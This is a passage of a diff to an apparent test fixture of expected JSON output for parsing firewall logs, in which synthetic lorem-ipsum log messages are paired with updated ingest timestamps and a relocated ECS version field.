"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=occae dtime=2016-05-08 07:27:59.552538723 +0000 UTC devid=ctetura devname=labore vd=texp date=2016-5-8 time=7:27:59 logid=tMalor type=acc subtype=amc level=very-high eventtime=amest logtime=corp srcip=10.176.216.90 srcport=2428 srcintf=eth2591 srcintfrole=dantiumt dstip=10.186.85.3 dstport=5366 dstintf=lo821 dstintfrole=ento poluuid=pic sessionid=evita proto=prm action=allow policyid=duntut policytype=magni crscore=102.339000 craction=uptat crlevel=uam appcat=boris service=nti srccountry=abi dstcountry=sectetur trandisp=uioffi tranip=10.114.16.155 tranport=1608 duration=62.941000 sentbyte=5110 rcvdbyte=3818 sentpkt=ipi app=reseos", "event": { - "ingested": "2021-12-09T13:37:31.906828Z" + "ingested": "2021-12-14T14:43:11.779389515Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=mcolab date=2016-5-22 time=2:30:33 log_id=neav devid=oquisqu devname=sperna logid=eabilloi type=estia subtype=tper level=very-high vd=volupt srcip=10.188.169.107 srcport=2138 srcintf=eth6448 dstip=10.214.7.83 dstport=1696 dstintf=lo1616 poluuid=tenatu sessionid=uun proto=HOPOPT action=cancel policyid=ectio trandisp=dutper duration=4.781000 sentbyte=3423 rcvdbyte=3252 devtype=radi osname=gel osversion=1.3917 mastersrcmac=iduntu srcmac=01:00:5e:21:f5:0a crscore=57.435000 craction=uamqu crlevel=lor eventtype=oide user=dolore service=amvolu hostname=eturadi6608.mail.host profile=aera reqtype=ate url=https://api.example.com/nimid/itatione.htm?umwr=oluptate#issus direction=inbound msg=uaUteni method=udantium cat=pre catdesc=xeacom device_id=stlabo log_id=dictasu pri=low userfrom=catc adminprof=nsect timezone=GMT-07:00 main_type=asia trigger_policy=econs sub_type=uir severity_level=dol policy=essecil src=10.23.62.94 src_port=4368 dst=10.61.163.4 dst_port=1232 http_method=luptatem http_url=atem http_host=gnido http_agent=ratvolu http_session_id=olup signature_subclass=numqua signature_id=1411 srccountry=inculpa content_switch_name=abo server_pool_name=veniamqu false_positive_mitigation=nse user_name=non monitor_status=paquioff http_refer=https://www5.example.org/maven/hende.jpg?labor=didunt#uptatema http_version=intocc dev_id=liqu threat_weight=eporr history_threat_weight=xeacomm threat_level=mveleu ftp_mode=nofdeFin ftp_cmd=sequam cipher_suite=temvel msg_id=ris", "event": { - "ingested": "2021-12-09T13:37:31.906833700Z" + "ingested": "2021-12-14T14:43:11.779389900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-6-5 time=9:33:08 logver=nisiuta devid=tvolu devname=ecte logid=tinvolu type=iurer subtype=iciadese level=medium vd=gnaaliq srcip=10.52.135.156 srcport=2660 srcintf=eth4502 dstip=10.133.89.11 dstport=1098 dstintf=lo4901 poluuid=sintoc sessionid=volupt proto=1 action=deny policyid=uiinea trandisp=Utenima duration=111.502000 sentbyte=1871 rcvdbyte=5074 devtype=ptatem osname=Nequepor osversion=1.2580 mastersrcmac=ugiatnu srcmac=01:00:5e:4a:7f:b8 crscore=103.738000 craction=mnisi crlevel=scivelit eventtype=tDuisaut user=oinBC service=quameius hostname=ipsumdol4488.api.localdomain profile=ommodico reqtype=ptas url=https://example.com/tetu/stru.htm?tlabore=Exc#pora direction=unknown msg=uteirure method=nevo cat=ide catdesc=aali device_id=adip log_id=tium pri=very-high userfrom=iusmodi adminprof=uamest timezone=PST main_type=uiac trigger_policy=epte sub_type=idolo severity_level=quinesc policy=madmi src=10.28.76.42 src_port=3427 dst=10.106.31.86 dst_port=4198 http_method=sno http_url=atno http_host=tani http_agent=volu http_session_id=nonn signature_subclass=inventor signature_id=6088 srccountry=autf content_switch_name=quamni server_pool_name=iatisu false_positive_mitigation=sec user_name=cons monitor_status=sBon http_refer=https://www.example.com/tae/ccaec.htm?aperiame=isc#ullamcor http_version=tobea dev_id=tor threat_weight=qui history_threat_weight=ntmollit threat_level=tenatus ftp_mode=cipitlab ftp_cmd=ipsumd cipher_suite=antiu msg_id=uirati", "event": { - "ingested": "2021-12-09T13:37:31.906837800Z" + "ingested": "2021-12-14T14:43:11.779390295Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ersp dtime=2016-06-20 04:35:42.332538723 +0000 UTC devid=tquov devname=diconseq vd=inven date=2016-6-20 time=4:35:42 logid=osquira type=tes subtype=mquame level=medium eventtime=tnulapa logtime=orain srcip=10.238.164.74 srcport=2201 srcintf=lo4249 srcintfrole=madmi dstip=10.106.162.153 dstport=341 dstintf=lo7114 dstintfrole=amvo poluuid=qui sessionid=tasn proto=1 action=accept policyid=squirati policytype=Sedutp crscore=92.058000 craction=nbyCic crlevel=utlabor appcat=itessequ service=porro srccountry=ine dstcountry=lup trandisp=tatemUt tranip=10.58.214.16 tranport=508 duration=166.566000 sentbyte=2715 rcvdbyte=7130 sentpkt=pici app=abor", "event": { - "ingested": "2021-12-09T13:37:31.906842Z" + "ingested": "2021-12-14T14:43:11.779390685Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=tquiin dtime=2016-07-04 11:38:16.592538723 +0000 UTC devid=tse devname=tenimad vd=minimav date=2016-7-4 time=11:38:16 logid=udexerci type=naal subtype=lore level=high eventtime=idolore logtime=pid srcip=10.225.141.20 srcport=2282 srcintf=enp0s4046 srcintfrole=natuse dstip=10.217.150.196 dstport=4639 dstintf=lo2438 dstintfrole=archite poluuid=loreme sessionid=untu proto=6 action=cancel policyid=datatno policytype=siutali crscore=49.988000 craction=usmodte crlevel=msequi appcat=tau service=exercita srccountry=ris dstcountry=eumiu trandisp=orumSe tranip=10.110.31.190 tranport=945 duration=12.946000 sentbyte=248 rcvdbyte=5300 sentpkt=eeufugia app=evit", "event": { - "ingested": "2021-12-09T13:37:31.906874Z" + "ingested": "2021-12-14T14:43:11.779391259Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-7-18 time=6:40:50 devname=molli device_id=velitse log_id=oditem type=generic subtype=gitsedqu pri=very-high devid=oremi devname=mestq logid=temUt type=olor subtype=ineavo level=very-high vd=mquelau srcip=10.168.236.85 srcport=6846 srcintf=eth651 dstip=10.140.113.244 dstport=4374 dstintf=lo4367 poluuid=fugitsed sessionid=quam proto=tcp action=deny policyid=fugiat trandisp=atisun duration=101.653000 sentbyte=3962 rcvdbyte=7741 devtype=dmin osname=fugi osversion=1.3319 mastersrcmac=inci srcmac=01:00:5e:e6:ad:ae crscore=39.291000 craction=avol crlevel=icero eventtype=xer user=emipsumd service=isisten hostname=cusant4946.www.domain profile=itecto reqtype=reetdol url=https://api.example.com/isnostr/umqu.htm?emquia=inesci#isnisi direction=unknown msg=aquioffi method=tamet cat=quatur catdesc=uisa device_id=eFi log_id=mexe pri=high userfrom=rpori adminprof=ice timezone=GMT+02:00 main_type=entorev trigger_policy=commodo sub_type=conseq severity_level=ame policy=tatn src=10.137.56.173 src_port=3932 dst=10.69.103.176 dst_port=1229 http_method=umdolo http_url=uptate http_host=amc http_agent=cusant http_session_id=orumSe signature_subclass=ratv signature_id=5227 srccountry=dutp content_switch_name=psaquaea server_pool_name=taevita false_positive_mitigation=ameiusm user_name=proide monitor_status=ano http_refer=https://www5.example.org/tvol/velitess.htm?edqui=nre#veli http_version=volupta dev_id=rnatu threat_weight=elitse history_threat_weight=ima threat_level=quasia ftp_mode=adi ftp_cmd=umwrit cipher_suite=uptate msg_id=mac", "event": { - "ingested": "2021-12-09T13:37:31.906881300Z" + "ingested": "2021-12-14T14:43:11.779391724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=dolore devname=\"onsecte\" devid=\"nBCSedut\" vd=ugiat date=2016-8-2 time=1:43:25 logid=onulam type=ate subtype=odoconse level=high eventtime=quatu logtime=veli srcip=10.30.47.165 srcport=631 srcintf=eth267 srcintfrole=sectet dstip=10.5.235.217 dstport=3689 dstintf=lo5047 dstintfrole=pitl poluuid=por sessionid=quidexea proto=tcp action=deny policyid=runtmol policytype=texpli crscore=57.772000 craction=ptass crlevel=rita appcat=esseci service=tametcon srccountry=liqua dstcountry=mvele trandisp=isis tranip=10.25.212.118 tranport=1190 duration=179.686000 sentbyte=238 rcvdbyte=7122 sentpkt=dantium app=lor", "event": { - "ingested": "2021-12-09T13:37:31.906888500Z" + "ingested": "2021-12-14T14:43:11.779392116Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-8-16 time=8:45:59 logver=onemulla devid=dolorem devname=tvolu logid=nreprehe type=tetu subtype=mdol level=high vd=nby srcip=10.20.26.210 srcport=2791 srcintf=eth5968 dstip=10.85.96.153 dstport=5286 dstintf=eth4392 poluuid=nsequat sessionid=doloreme proto=0 action=deny policyid=reprehe trandisp=tincu duration=93.111000 sentbyte=2826 rcvdbyte=6247 devtype=lor osname=oraincid osversion=1.225 mastersrcmac=emeumfug srcmac=01:00:5e:1d:39:39 crscore=114.626000 craction=liqua crlevel=olo eventtype=psumqu user=untincul service=iduntu hostname=ccaeca5504.internal.example profile=reseo reqtype=oreetd url=https://example.org/tiaec/rumwrit.txt?oconsequ=edquiac#urerepr direction=external msg=ercit method=etMal cat=qua catdesc=rsita device_id=ate log_id=ipsamvo pri=low userfrom=adeseru adminprof=tdol timezone=CET main_type=rem trigger_policy=asper sub_type=idunt severity_level=luptat policy=eveli src=10.149.13.76 src_port=7809 dst=10.40.152.253 dst_port=1478 http_method=ritt http_url=iaeco http_host=equaturv http_agent=siu http_session_id=snost signature_subclass=tpersp signature_id=2624 srccountry=quaea content_switch_name=ametcons server_pool_name=utali false_positive_mitigation=porinc user_name=tetur monitor_status=xce http_refer=https://example.com/aincidu/nimadmin.jpg?itinv=eumfugi#etdolor http_version=lupta dev_id=xeaco threat_weight=nvolupt history_threat_weight=oremi threat_level=elites ftp_mode=nbyCi ftp_cmd=tevel cipher_suite=usc msg_id=rem", "event": { - "ingested": "2021-12-09T13:37:31.906893800Z" + "ingested": "2021-12-14T14:43:11.779392501Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=cab dtime=2016-08-30 15:48:33.632538723 +0000 UTC devid=atisund devname=xea vd=ites date=2016-8-30 time=3:48:33 logid=isetq type=iutali subtype=velite level=high eventtime=avolupt logtime=ariatur srcip=10.98.194.212 srcport=5469 srcintf=lo1208 srcintfrole=atisetqu dstip=10.51.213.42 dstport=988 dstintf=enp0s3449 dstintfrole=ilmol poluuid=eri sessionid=quunt proto=HOPOPT action=deny policyid=mquae policytype=eriti crscore=96.729000 craction=cidunt crlevel=plica appcat=ore service=quidolor srccountry=inven dstcountry=eufugi trandisp=accusant tranip=10.233.120.207 tranport=136 duration=171.844000 sentbyte=2859 rcvdbyte=4844 sentpkt=eaqu app=nvol", "event": { - "ingested": "2021-12-09T13:37:31.906899600Z" + "ingested": "2021-12-14T14:43:11.779392889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=leumiu devname=\"tla\" devid=\"item\" vd=nimid date=2016-9-13 time=10:51:07 logid=dat type=periam subtype=dqu level=high eventtime=dminima logtime=dutpers srcip=10.245.187.229 srcport=4953 srcintf=lo3642 srcintfrole=prehen dstip=10.67.132.242 dstport=2340 dstintf=enp0s2700 dstintfrole=sequa poluuid=iosamnis sessionid=volupt proto=6 action=allow policyid=idid policytype=tesse crscore=64.509000 craction=boru crlevel=ptateve appcat=enderi service=ptatem srccountry=ptatevel dstcountry=tenatuse trandisp=psaqua tranip=10.241.132.176 tranport=7224 duration=167.705000 sentbyte=6595 rcvdbyte=7301 sentpkt=tame app=atione", "event": { - "ingested": "2021-12-09T13:37:31.906905600Z" + "ingested": "2021-12-14T14:43:11.779393386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-9-28 time=5:53:42 logver=vitaedic devid=orin devname=uii logid=estl type=sitam subtype=orem level=very-high vd=uuntur srcip=10.210.28.247 srcport=3449 srcintf=eth4185 dstip=10.237.180.17 dstport=3023 dstintf=lo7672 poluuid=tate sessionid=onevo proto=6 action=allow policyid=aeconseq trandisp=lor duration=96.560000 sentbyte=2760 rcvdbyte=1775 devtype=emqu osname=riss osversion=1.1847 mastersrcmac=sitvol srcmac=01:00:5e:a5:5a:54 crscore=129.120000 craction=olorsi crlevel=aliq eventtype=mes user=mven service=olorsit hostname=tore7088.www.invalid profile=ruredo reqtype=mac url=https://mail.example.org/ptassita/its.gif?risnis=uov#itlab direction=outbound msg=sBono method=loremqu cat=tetur catdesc=amvo device_id=siuta log_id=urmagn pri=low userfrom=uptat adminprof=idex timezone=GMT+02:00 main_type=tatione trigger_policy=nimveni sub_type=idi severity_level=ore policy=quid src=10.212.214.4 src_port=6040 dst=10.199.47.220 dst_port=4084 http_method=oin http_url=hil http_host=cingel http_agent=modocon http_session_id=ipsu signature_subclass=ntNeq signature_id=1081 srccountry=aUt content_switch_name=boNem server_pool_name=nturm false_positive_mitigation=emips user_name=atv monitor_status=onu http_refer=https://www5.example.net/alorum/obeataev.gif?atDu=nsec#quidolor http_version=oqu dev_id=naaliq threat_weight=remeu history_threat_weight=osquir threat_level=mod ftp_mode=col ftp_cmd=mve cipher_suite=liquide msg_id=odt", "event": { - "ingested": "2021-12-09T13:37:31.906911400Z" + "ingested": "2021-12-14T14:43:11.779393771Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-10-12 time=12:56:16 logver=inv devid=rroq devname=rcit logid=aecatcup type=olabor subtype=estl level=very-high vd=citatio srcip=10.168.40.197 srcport=7699 srcintf=enp0s3071 dstip=10.206.69.135 dstport=6396 dstintf=eth3862 poluuid=utfug sessionid=aturQu proto=udp action=deny policyid=mipsamvo trandisp=eiusmod duration=91.147000 sentbyte=6153 rcvdbyte=4059 devtype=oreveri osname=ehende osversion=1.760 mastersrcmac=Except srcmac=01:00:5e:bf:07:ee crscore=45.760000 craction=dol crlevel=sciun eventtype=metcons user=itasper service=uae hostname=mve1890.internal.home profile=tatemU reqtype=mad url=https://www.example.org/redol/gnaa.htm?aliquamq=dtempori#toditaut direction=unknown msg=dexerc method=strumex cat=eprehend catdesc=asnu device_id=hitec log_id=henderit pri=medium userfrom=perspici adminprof=ationul timezone=PST main_type=itsedq trigger_policy=uto sub_type=emUte severity_level=molestia policy=quir src=10.46.56.204 src_port=2463 dst=10.234.165.130 dst_port=7079 http_method=umf http_url=quames http_host=dolorsit http_agent=archite http_session_id=remq signature_subclass=veniamq signature_id=1236 srccountry=uta content_switch_name=emo server_pool_name=itq false_positive_mitigation=derit user_name=orese monitor_status=dolor http_refer=https://mail.example.com/ntexpl/dunt.jpg?yCic=nder#mdolore http_version=Cic dev_id=olorema threat_weight=mollita history_threat_weight=tatem threat_level=iae ftp_mode=quido ftp_cmd=emip cipher_suite=inBC msg_id=mol", "event": { - "ingested": "2021-12-09T13:37:31.906917200Z" + "ingested": "2021-12-14T14:43:11.779394327Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=turadipi date=2016-10-26 time=7:58:50 log_id=usmodi devid=ree devname=saquaea logid=ation type=luptas subtype=minim level=very-high vd=lorsi srcip=10.61.123.159 srcport=754 srcintf=eth7713 dstip=10.141.158.225 dstport=4690 dstintf=lo1586 poluuid=ate sessionid=idolor proto=1 action=block policyid=nreprehe trandisp=onse duration=71.505000 sentbyte=4010 rcvdbyte=4527 devtype=duntutla osname=ntium osversion=1.4450 mastersrcmac=asuntexp srcmac=01:00:5e:26:56:73 crscore=5.843000 craction=nse crlevel=modoc eventtype=boNem user=iumt service=tsed hostname=eturad6143.www.home profile=uamnihil reqtype=llam url=https://example.net/aparia/tatnon.jpg?rever=ore#offici direction=outbound msg=metco method=acom cat=ceroinB catdesc=nim device_id=utaliqu log_id=rsi pri=high userfrom=imadmi adminprof=isnis timezone=CEST main_type=olupta trigger_policy=tsuntinc sub_type=inrepreh severity_level=quovo policy=urExcep src=10.128.46.70 src_port=5269 dst=10.95.117.134 dst_port=1723 http_method=acommodi http_url=essecill http_host=billoi http_agent=moles http_session_id=dipiscin signature_subclass=olup signature_id=5976 srccountry=undeomni content_switch_name=accusa server_pool_name=natu false_positive_mitigation=liquid user_name=enim monitor_status=Finibus http_refer=https://www.example.org/xeacom/des.gif?umdolo=ntiu#radipisc http_version=Cice dev_id=taedi threat_weight=tquido history_threat_weight=ptasnula threat_level=oru ftp_mode=ill ftp_cmd=mporinc cipher_suite=onsectet msg_id=idolo", "event": { - "ingested": "2021-12-09T13:37:31.906923Z" + "ingested": "2021-12-14T14:43:11.779396210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-11-10 time=3:01:24 logver=edolo devid=ugiatquo devname=ntium logid=uptate type=lloinven subtype=econs level=medium vd=tetura srcip=10.135.106.42 srcport=6602 srcintf=lo154 dstip=10.224.30.160 dstport=5302 dstintf=eth1247 poluuid=etconsec sessionid=caboNem proto=21 action=cancel policyid=rumetMal trandisp=oconse duration=2.970000 sentbyte=7685 rcvdbyte=1506 devtype=sequam osname=oditempo osversion=1.7544 mastersrcmac=taliqui srcmac=01:00:5e:98:79:a3 crscore=78.248000 craction=rcitat crlevel=dolorema eventtype=emagn user=radipis service=ctetu hostname=orinrep5386.www.corp profile=stenatus reqtype=equep url=https://www.example.com/tali/BCS.txt?iqu=niamqu#equamnih direction=inbound msg=autemv method=emq cat=plicaboN catdesc=amc device_id=vol log_id=admi pri=medium userfrom=culpaq adminprof=saute timezone=GMT+02:00 main_type=ende trigger_policy=abor sub_type=magnid severity_level=adol policy=iutal src=10.208.21.135 src_port=2721 dst=10.253.228.140 dst_port=6748 http_method=ugitse http_url=quiineav http_host=billoinv http_agent=sci http_session_id=col signature_subclass=obea signature_id=5700 srccountry=tatev content_switch_name=luptas server_pool_name=uptatem false_positive_mitigation=oinv user_name=inculp monitor_status=onofd http_refer=https://internal.example.org/nisiu/imad.html?ptatem=itasp#dexe http_version=tat dev_id=onproide threat_weight=ntmo history_threat_weight=loreeu threat_level=temse ftp_mode=aspernat ftp_cmd=ume cipher_suite=caecat msg_id=rautod", "event": { - "ingested": "2021-12-09T13:37:31.906928700Z" + "ingested": "2021-12-14T14:43:11.779396746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=ercitat date=2016-11-24 time=10:03:59 log_id=lapar devid=ritati devname=edquia logid=itesse type=mullam subtype=mexerc level=medium vd=amvolu srcip=10.120.231.161 srcport=1129 srcintf=lo653 dstip=10.210.62.203 dstport=4381 dstintf=lo3057 poluuid=ataevita sessionid=oremqu proto=6 action=cancel policyid=velitsed trandisp=magnaali duration=92.900000 sentbyte=3984 rcvdbyte=4009 devtype=ulla osname=equatDu osversion=1.1710 mastersrcmac=aconse srcmac=01:00:5e:92:c2:23 crscore=20.350000 craction=squira crlevel=aliqui eventtype=ess user=uide service=scivel hostname=henderi724.www5.home profile=tquas reqtype=aquio url=https://www.example.com/iame/orroquis.htm?tiumd=ntmoll#mexer direction=internal msg=isnostru method=nofdeFi cat=aquioff catdesc=saqu device_id=remips log_id=illoi pri=medium userfrom=abori adminprof=uisnostr timezone=GMT+02:00 main_type=ilmole trigger_policy=ugi sub_type=niamquis severity_level=nisi policy=emveleum src=10.243.226.122 src_port=3512 dst=10.3.23.172 dst_port=7332 http_method=emullamc http_url=tec http_host=Nemo http_agent=tutlabo http_session_id=mveleum signature_subclass=liq signature_id=7229 srccountry=sBonorum content_switch_name=atems server_pool_name=quira false_positive_mitigation=tassita user_name=olorem monitor_status=sedquiac http_refer=https://www.example.com/atDuis/asnulapa.html?rumwri=velill#ore http_version=tation dev_id=loinve threat_weight=tatevel history_threat_weight=iumdolo threat_level=untu ftp_mode=ict ftp_cmd=squirati cipher_suite=tem msg_id=mestq", "event": { - "ingested": "2021-12-09T13:37:31.906934400Z" + "ingested": "2021-12-14T14:43:11.779397457Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=luptate date=2016-12-8 time=5:06:33 log_id=llamc devid=eleumiu devname=uei logid=Nequepo type=radipis subtype=cive level=low vd=orumSec srcip=10.56.74.7 srcport=6149 srcintf=eth2940 dstip=10.73.10.215 dstport=2079 dstintf=lo3472 poluuid=oeni sessionid=untutlab proto=0 action=cancel policyid=consecte trandisp=pteurs duration=26.872000 sentbyte=617 rcvdbyte=1651 devtype=ons osname=tiaecon osversion=1.5380 mastersrcmac=unt srcmac=01:00:5e:99:7b:4a crscore=124.392000 craction=queporro crlevel=uid eventtype=snostrum user=psa service=nculpaq hostname=reseosqu1629.mail.lan profile=utemvel reqtype=epteur url=https://www.example.net/iame/laudanti.htm?stquido=rsitvolu#mnisi direction=external msg=uameiusm method=adm cat=gelitsed catdesc=tiumto device_id=cor log_id=odoco pri=high userfrom=labore adminprof=ianonnu timezone=PST main_type=rum trigger_policy=erc sub_type=ehende severity_level=tutla policy=licaboNe src=10.94.242.80 src_port=2724 dst=10.106.85.174 dst_port=307 http_method=atiset http_url=serror http_host=onse http_agent=umquam http_session_id=emagn signature_subclass=emulla signature_id=1963 srccountry=iquaUt content_switch_name=mnihilm server_pool_name=redo false_positive_mitigation=etMaloru user_name=lmo monitor_status=iquidex http_refer=https://www.example.org/remipsu/tan.html?mcorpor=doconse#etdol http_version=dolorsi dev_id=nturmag threat_weight=tura history_threat_weight=osquirat threat_level=equat ftp_mode=aliquid ftp_cmd=usantiu cipher_suite=idunt msg_id=atqu", "event": { - "ingested": "2021-12-09T13:37:31.906940200Z" + "ingested": "2021-12-14T14:43:11.779397847Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=liquam dtime=2016-12-23 00:09:07.712538723 +0000 UTC devid=min devname=oluptat vd=odt date=2016-12-23 time=12:09:07 logid=rspici type=snisi subtype=magnaal level=low eventtime=etquasia logtime=nula srcip=10.117.63.181 srcport=5299 srcintf=lo7416 srcintfrole=Cicero dstip=10.247.53.179 dstport=6493 dstintf=lo3706 dstintfrole=atemaccu poluuid=veritat sessionid=aliquipe proto=3 action=block policyid=aer policytype=osquira crscore=171.144000 craction=minim crlevel=scipi appcat=tur service=acon srccountry=Nemoenim dstcountry=usm trandisp=labori tranip=10.168.20.20 tranport=68 duration=167.038000 sentbyte=7188 rcvdbyte=5749 sentpkt=xeac app=umdolors", "event": { - "ingested": "2021-12-09T13:37:31.906944300Z" + "ingested": "2021-12-14T14:43:11.779398393Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=uiadolo date=2017-1-6 time=7:11:41 log_id=empor devid=umexerci devname=duntut logid=uovol type=prehend subtype=eufug level=low vd=eufug srcip=10.100.53.8 srcport=4318 srcintf=eth5767 dstip=10.163.17.172 dstport=854 dstintf=enp0s3903 poluuid=upta sessionid=atc proto=3 action=block policyid=upta trandisp=itessequ duration=165.935000 sentbyte=4211 rcvdbyte=405 devtype=exerci osname=idata osversion=1.2208 mastersrcmac=usmod srcmac=01:00:5e:c0:47:f3 crscore=135.374000 craction=isiutali crlevel=iquidexe eventtype=illumq user=luptatem service=ite hostname=tasnul4179.internal.host profile=amvo reqtype=tnul url=https://www.example.org/ess/quiad.jpg?ten=litanim#rQuisaut direction=inbound msg=modico method=metco cat=cillu catdesc=iuntNeq device_id=eddoei log_id=rsin pri=very-high userfrom=eriam adminprof=pernat timezone=CEST main_type=imve trigger_policy=essequam sub_type=ueporro severity_level=aliqu policy=upt src=10.141.156.217 src_port=2700 dst=10.53.168.187 dst_port=73 http_method=emacc http_url=emp http_host=lamcola http_agent=veli http_session_id=venia signature_subclass=risni signature_id=1535 srccountry=uat content_switch_name=onemulla server_pool_name=riaturEx false_positive_mitigation=deri user_name=amqu monitor_status=lorsitam http_refer=https://api.example.org/onpr/litseddo.gif?oremqu=idex#radip http_version=upta dev_id=tetura threat_weight=rumet history_threat_weight=uptasnul threat_level=antiumdo ftp_mode=ecill ftp_cmd=iduntu cipher_suite=pisci msg_id=sunt", "event": { - "ingested": "2021-12-09T13:37:31.906948900Z" + "ingested": "2021-12-14T14:43:11.779398779Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2017-1-20 time=2:14:16 devname=oco device_id=aboree log_id=ainci type=generic subtype=osqu pri=very-high devid=sus devname=imavenia logid=expli type=ugiat subtype=rnat level=low vd=orem srcip=10.37.174.58 srcport=3193 srcintf=lo2990 dstip=10.249.60.66 dstport=4859 dstintf=enp0s1732 poluuid=eve sessionid=tco proto=3 action=accept policyid=oluptate trandisp=lit duration=70.988000 sentbyte=6327 rcvdbyte=837 devtype=oquisqu osname=turadip osversion=1.3402 mastersrcmac=amc srcmac=01:00:5e:dd:dc:44 crscore=160.379000 craction=apar crlevel=runtm eventtype=eturadip user=olorsi service=itseddo hostname=bore5546.www.local profile=labo reqtype=lpaquiof url=https://example.com/xeac/llitanim.txt?oreverit=scip#Finibus direction=inbound msg=eufugia method=ncididun cat=hen catdesc=periamea device_id=itametco log_id=vel pri=high userfrom=rere adminprof=pta timezone=CEST main_type=equeporr trigger_policy=met sub_type=volup severity_level=ptate policy=entsu src=10.44.198.184 src_port=5695 dst=10.189.82.19 dst_port=4267 http_method=odoc http_url=atura http_host=tur http_agent=tur http_session_id=atnonpr signature_subclass=ita signature_id=7570 srccountry=colabori content_switch_name=imidestl server_pool_name=piscing false_positive_mitigation=ceroi user_name=iconsequ monitor_status=iat http_refer=https://www.example.net/siuta/atev.htm?CSe=exerci#inesciu http_version=quid dev_id=atcupid threat_weight=onse history_threat_weight=psa threat_level=ate ftp_mode=con ftp_cmd=tqu cipher_suite=eirur msg_id=dese", "event": { - "ingested": "2021-12-09T13:37:31.906954200Z" + "ingested": "2021-12-14T14:43:11.779399246Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=mquisnos date=2017-2-3 time=9:16:50 log_id=lore devid=isci devname=Dui logid=reetdo type=ever subtype=civelits level=high vd=quiav srcip=10.154.34.15 srcport=5986 srcintf=enp0s4064 dstip=10.153.172.249 dstport=7030 dstintf=enp0s3067 poluuid=henderit sessionid=remq proto=21 action=cancel policyid=tla trandisp=arch duration=52.795000 sentbyte=5453 rcvdbyte=3097 devtype=ror osname=onsecte osversion=1.91 mastersrcmac=aecatcup srcmac=01:00:5e:58:7e:f5 crscore=133.560000 craction=quas crlevel=occaeca eventtype=eturadip user=ent service=rumSecti hostname=Utenima260.mail.invalid profile=cept reqtype=aedictas url=https://api.example.org/orio/gna.gif?aaliquaU=olu#iameaque direction=external msg=essequa method=aquio cat=rspicia catdesc=deom device_id=oluptat log_id=roinBCSe pri=medium userfrom=onproide adminprof=uamnih timezone=GMT+02:00 main_type=tatisetq trigger_policy=uidolo sub_type=umdolore severity_level=dmi policy=tam src=10.151.170.207 src_port=1400 dst=10.181.183.104 dst_port=5554 http_method=amni http_url=tatio http_host=amquisno http_agent=modoc http_session_id=magnam signature_subclass=uinesc signature_id=4248 srccountry=idatat content_switch_name=onev server_pool_name=orsi false_positive_mitigation=ntsunt user_name=iosamni monitor_status=idu http_refer=https://example.net/idolo/reet.txt?its=umdolor#isiu http_version=assi dev_id=eserun threat_weight=rvelill history_threat_weight=lupta threat_level=byC ftp_mode=imadm ftp_cmd=uta cipher_suite=tisu msg_id=remagnam", "event": { - "ingested": "2021-12-09T13:37:31.906958900Z" + "ingested": "2021-12-14T14:43:11.779399647Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=iumdo date=2017-2-18 time=4:19:24 log_id=iusmodit devid=aturv devname=ectetura logid=obeataev type=umf subtype=olesti level=low vd=quaeabil srcip=10.19.99.129 srcport=956 srcintf=eth62 dstip=10.205.132.218 dstport=1643 dstintf=enp0s5908 poluuid=inim sessionid=etdol proto=17 action=deny policyid=oremeumf trandisp=lesti duration=49.961000 sentbyte=3376 rcvdbyte=6209 devtype=enima osname=tnulapar osversion=1.7278 mastersrcmac=sequ srcmac=01:00:5e:4a:1d:f8 crscore=84.522000 craction=tionula crlevel=accus eventtype=uatu user=mquis service=lab hostname=uido2046.mail.lan profile=tena reqtype=aal url=https://mail.example.org/nimadmin/lumqui.txt?iquip=tinculpa#umtota direction=external msg=rumSecti method=riamea cat=eca catdesc=oluptate device_id=Duisa log_id=consequa pri=low userfrom=iaecon adminprof=aevitaed timezone=PT main_type=rep trigger_policy=remap 